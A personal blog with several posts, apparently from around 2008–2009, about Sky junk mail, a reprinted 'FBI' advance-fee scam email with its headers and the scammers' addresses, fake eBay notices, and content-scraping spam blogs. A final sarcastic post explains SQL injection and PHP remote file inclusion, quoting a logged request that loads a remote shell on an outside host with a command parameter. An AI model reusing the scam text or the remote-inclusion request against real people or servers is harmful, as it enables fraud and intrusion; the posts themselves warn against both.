soledad penadés

I have pretty much reduced my physical communications (i.e. letters) to nothing. My bank doesn’t send me extracts of the operations that I am already aware of –because I check them online. My phone company doesn’t send me a physical invoice. Same for the internet provider.

Except there are still companies like Sky who keep sending me their “magazine”, which is in fact an advertising leaflet trying to convince me of the amazing benefits of their services and get me to sign up. The worst is that it isn’t even addressed to me; it is just sent to “the present occupier”.

And I normally just pick it as it is pushed into our door by the post man, and drop it into the recycling bag without even opening it, because I don’t have the slightest interest in TV in general and Sky in particular (apart from the well known fact that we don’t own a TV set). But today I thought: hey maybe there is a way for me to tell them not to spam my mailbox with useless offers. So I opened it.

Oh how wrong I was. No, no and no. There is small print: on every footer on pretty much every page, but it is all dedicated to correcting what they offer with big bold capital letters on the remaining 85% of the pages. There’s no word about how to stop them sending you this abominable waste of resources.

I even went to their website, just in case, but again the same style: SIGN UP SIGN UP SIGN UP, and in very small letters, a myriad of restrictions.

So, how do I get them to stop sending me this rubbish and having me have to dispose of it every single time? Should we just send them an invoice accounting for all the time it takes us to get rid of the unsolicited physical letters they send to an unnamed addressee?

Advice is welcome!

(I haven’t looked into anything regarding the Data Protection Act because well… they are just sending letters to “whoever lives here”. It doesn’t quite fit with the idea of personal data being abused for commercial purposes.)

This time they have been really creative. What an amazing story to start the day!

The interesting technical detail is that it seems they are using the site of a certain Bonnie Langford (Wikipedia says she’s an actress and entertainer) to propel their spam into the UK, as I see by looking at the headers:

Received: from htt.cn (mail.htt.cn [61.152.94.80])
	by my.domain (Postfix) with SMTP id 56FAC4C032
	for <myemail@address>; Fri, 24 Jul 2009 02:06:45 +0000 (GMT)
Received: from User ([196.3.183.72])
	(envelope-sender <sales@htt.cn>)
	by 61.152.94.80 with ESMTP
	for <list@bonnielangford.co.uk>; Fri, 24 Jul 2009 09:49:01 +0800

my.domain and myemail@address are obviously substitutes for the real thing ;)

From: FBI (sales@htt.cn)
Reply-To: robertfbgent11@live.com
ROBERT MUELLER III
EXECUTIVE DIRECTOR FBI
FEDERAL BUREAU OF INVESTIGATION FBI.WASHINGTON DC.
FBI SEEKING TO WIRETAP INTERNET

ATTENTION:

We believe this notification meets you in a very good present state of mind and health. We the Federal bureau of investigation (FBI) Washington, DC in conjunction with some other relevant Investigation Agencies here in the United states of America have recently been informed through our Global intelligence monitoring network that you presently have a transaction going on with the Central Bank of Nigeria (CBN) And also With the Fedral Ministry of Finance as regards to your over-due contract payment which was fully endorsed in your favor accordingly.It might interest you to know that we have taken out time in screening through this project as stipulated on our protocol of operation and have finally confirmed that your contract payment is 100% genuine and hitch free from all facet and of which you have the lawful right to claim your fund without any further delay.Having said all this, we will further advise that you go ahead in dealing with FEDEX SHIPPING HEAD MANAGER OF INTERNA
TIONAL SHIPPING DEPARTMENT REV EM

In addendum, also be informed that we recently had a meeting with the Executive Governor of the Central Bank of Nigeria And the State Finance Department, in the person of Prof. Chukwuma Soludo and Mr. Aderemi Babalola on along with some of the top officials of the Ministry regarding your case and they made us to understand that your file has been held in abase depending on when you personally come for the claim. They also told us that the only problem they are facing right now is that some unscrupulous element are using this project as an avenue to scam innocent people off their hard earned money by impersonating the Executive Governor and the FEDEX SHIPPING COMPANY WHO ARE INCHARGE TO GET YOUR ATM CARD SHIPPED TO YOU.

We were also made to understand that a lady with name Mrs. Joan C. Bailey from OHIO Try to Cliam your fund Package from them and also told them you sent her to collect THE ATM CARD PACKAGE WHICH THE TOTAL IN IT IS $20 MILLION USD AND THIS INCLUDE INTEREST RATE UP TO DATE.

REV EMMANUEL JOHNSON did the wise thing by insisting on hearing from you personally before they go ahead on and sending the package which contain the ATM CARD AND ALL IT BACK UP DOCUMENT TO THE LADY so that was the main reason why they contacted us so as to assist them in making the investigations.

They further informed us that we should warn our dear citizens who must have been informed of the contract payment which was awarded to them from the Central Bank of Nigeria, to be very careful prior to this irregularities so that they don’t fall victim to this ugly circumstance. And should in case you are already dealing with anybody or office claiming to be from the Central Bankof Nigeria OR from Fedex Shipping company, you are further advised to STOP further contact with them in your best interest and then contact immediately the real office of the FEDEX SHIPPING COMAPNY IN CHARGE OF YOUR ATM CARD PACKAGE AND ALL IT BACK UP DOCUMENT SO IT CAN BE SHIPPED TO YOU ONCE THEY RECEIVE YOUR MESSAGE.

MY ADVICE TO YOU NOW IS TO CONTACT REV EMMANUEL JOHNSON VIA EMAIL HE IS THE MANAGER OF FEDEX INTERNATIONAL SHIPPING DEPARTMENT WITH THE INFORMATION BELOW AND HE WILL TELL YOU WHAT TO DO NEXT ON HOW TO GET YOUR ATM CARD PACKAGE SHIPPED TO YOUR RESIDENTIAL ADDRESS.

CONTACT REV EMMANUEL JOHNSON THROUGH EMAIL ( EMMAJOHNSIDE11@HOTMAIL.COM ) FOR MORE INFORMATION ON HOW TO GET YOUR ATM CARD PACKAGE WHICH CONTAIN $20 MILLION USD.

FEDEX BUILDING COMPANY
10 RIVERSIDE STREET.
LAGOS,NIGERIA
NAME: REV EMMANUEL JOHNSON
EMAIL: emmajohnside11@hotmail.com

NOTE:

In your best interest, any message that doesn’t come from the above official email address should not be replied to and should be disregarded accordingly for security reasons. Meanwhile, we will advise that you contact the FEDEX OFFICE AVOVE THROUGH EMAIL immediately with the above email address and request that they attend to your payment file as directed so as to enable you receive your contract fund accordingly.Ensure you follow all their procedure as may be required by them as that will further help hasten up the whole procedures as regards to the transfer of your fund to you as designated. Also have in mind that the FEDEX INTERNATIONAL SHIPPING DEPARTMENT equally have their own protocol of operation as stipulated on their banking terms, so delay could be very dangerous. Once again, we will advise that you contact them with the above email address and make sure you forward to them all the necessary informations which they may require from you prior to the release of your
fund to you accordingly.

All modalities has already been worked out even before you were contacted and note that we will be monitoring all your dealings with them as you proceed so you don’t have anything to worry about. All we require from you henceforth is an update so as to enable us be on track with you and the FEDEX INTERNATIONAL SHIPPING DEPARTMENT. Without wasting much time, will want you to contact them immediately with the above email address so as to enable them attend to your case accordingly without any further delay as time is already running out.Should in case you need any more informations in regards to this notification,feel free to get back to us so that we can brief you more as we are here to guide you during and after this project has been completely perfected and you have received your contract fund as stated.Thank you very much for your anticipated co-operation in advance as we earnestly await your urgent response to this matter.

Best Regards remember Once you contact him keep me update,

Robert S. Mueller III
Federal Bureau of Investigation
J. Edgar Hoover Building
935 Pennsylvania Avenue,
NW Washington, D.C.
20535-0001, USA

I guess it should go without saying, but this is a scam. If you receive an e-mail like this one, do not reply them in order to get access to an ATM card that contains 20 millions of dollars, because you [should already] know they do not belong to you :P

Not that I don’t trust the usual visitors of my blog, but you never know who’s going to show up here coming from Google and friends….

As soon as I posted yesterday’s analysis on eBay scams, I began to get a lot of pingbacks from quite suspiciously looking websites, with domains like ebayblog.info, ebay4you.info, etc… all of them using the .info TLD, which is one of the most commonly used by spammers as far as I have seen.

So it seems they didn’t have enough with parked domains with lots of AdSense ads on the front page, now they have devised some kind of ultraspeedy spider which might be crawling recent posts on certain topics and then stealing the content to feed their domains. Just look at the post id’s they are handling: 19574, 23288… it’s humanely impossible to write as many articles in domains that young, even if you are so damn verbose! (On second thought: maybe Scobleizer could do that…)

I guess they are using technorati or google blog search to perform a periodic, automated search, although I have seen what looked like robots with strange user agents accessing my domain sometimes and they might be the same kind of content thieves.

But you can’t do much when your stuff is online, other than hoping that people are clever enough to distinguish the good source from the bad one :D

Everything began with this scam, which I received several times. I kept copies just for the sake of observing what would follow. Since you know, once s(c|p)ammers get your e-mail address, the rubbish stream won’t stop flowing:

The missing ‘Sony Vaio PCG-VGX Brand New’

Hi again, i have no laptop from you by now if i don`t get an answer in 24 hours i will report you to eBay , PayPal and Police.

The user name was 361jaraldo, obviously totally automated. It surprised me at first since I had never received any fake eBay email like this before, but it was easy to spot it was false. Not only because I hadn’t sold any Sony Vaio that I don’t own, but also because real eBay emails include your name on them. This one didn’t.

What made me laugh was the menacing writing style: he would report to eBay, PayPal and Police!! Yeah, I’m truly frightened!!

Gold lock and key pendant necklace

This one deals with something that I would never ever own or try to buy, it just sounds so blingy-blingy that if it wasn’t because I’m sitting on a window inundated by the Mediterranean sun at its best, I would be already shivering.

findingaldo has opened an Unpaid Item case for GOLD EP LOCK AND KEY PENDANT NECKLACE 16-18 SNAKE CHAIN(#250319773021).

Please pay for the item or respond to the seller before Nov-29-2008. If you do not take any action, the seller can choose to give you an an Unpaid Item strike and your account may be suspended as a result.

Ohhh yes I’m sooooo scared! And look at the name: findingaldo. It reminds me to that Waldo Geraldo Falko which used to show up at Bel Air’s Prince series.

Plasma TV

This is the latest I got, and it is specially funny considering I don’t own a TV and the last thing I would do if I wanted to get rid of one would be selling it in Ebay. The packaging and shipping costs to make sure it arrived without damage would be astronomical!

Please get me back to me as soon as you can with further information about the shipping of the plasma tv that i have bought from you. I am looking forward to get your reply. Thanks in advance !!

But… what for?

I wonder what’s the purpose of these e-mails. I mean, the Nigerian-style scams make sense in a way, the Viagra, levitra and tramadol spam emails also make sense in a way, but getting urged to contact someone regarding an item that you don’t own and consequently can’t sell, or its shipping costs, doesn’t make any sense to me. Unless they want to harvest e-mail addresses of ingenuous people, which in that case it does make totally sense.

It works like that: you write dynamic code and allow parameters to be sent to your code. Then without any type of filtering or validation you use those raw values as parameters for your code.

I’ll give you two examples so that you can get the result almost instantly:

Example 1: open up your database

The script would be called as news.php?id=1, which would mean “give me the news whose id equals 1″

Then in news.php you have something like

This will make it easy even for level 1 script kiddies to practise their exploiter skills. Nothing too serious, you know, they may freely read and modify your data. Child games!

To make sure they get the maximum benefit of their stay in your server, don’t forget to store unencrypted passwords, so when they copy the users table, they can try to log into all the users’ accounts since most of the people use the same password for every online service.

Example 2: open up your file system (and everything else)

You’ve been told about the advantages of using include files. You not only are using include() for including the header and footer, but you load each section using something like index.php?section=name_of_the_section

Then in index.php you have this:

Usually it would be used with values of $_GET['section'] such as ‘clients.htm’, ‘about_us.htm’, ‘our_company.htm’… You name it! But what would you say if a script kiddie went creative and instead of just entering a simple filename in your server, decided to add an http:// in front of it?

Like for example: index.php?section=http://astrangeserver/somewhere/including/usually/an/image.jpg

Php will kindly load whatever is in that url and evaluate the contents as php code.

What, evaluate an image? You’ll be surprised.

Try to open that image in your browser. Oh, image.jpg “can’t be displayed by the browser because it contains errors”. Really? Of course, because it’s not meant to be displayed, but to be executed. In fact it is a php file which contains code for converting your innocent index.php in a complete control panel from where a cracker can install more stuff in your server, or even try to deface other websites.

So php loads it, evaluates it and suddenly there’s a bunch of code ready to be executed at the cracker’s will.

Isn’t it brilliant, amazing, great?

… obviously not!

It’s like eating food from dodgy take-aways without thinking twice. You never know what you eat!

I personally I’m bored to death of finding in the server logs request such as index.php?id=http://www.antiqbook.co.uk/map/.xpl/lila.jpg?&cmd=cat%20bugado

And it just shows there’s still people tacitly allowing undesirable behaviour to happen in their servers, without giving a damn about that, or even worse, without knowing about that. I wonder if the antiqbook administrators know about this directory with plenty of exploits, remote shells and what not in their server. Or maybe they are just a fake company.

So do us a favour: filter and validate your url parameters and stop contributing to illegal activities such as spam. Thank you very much.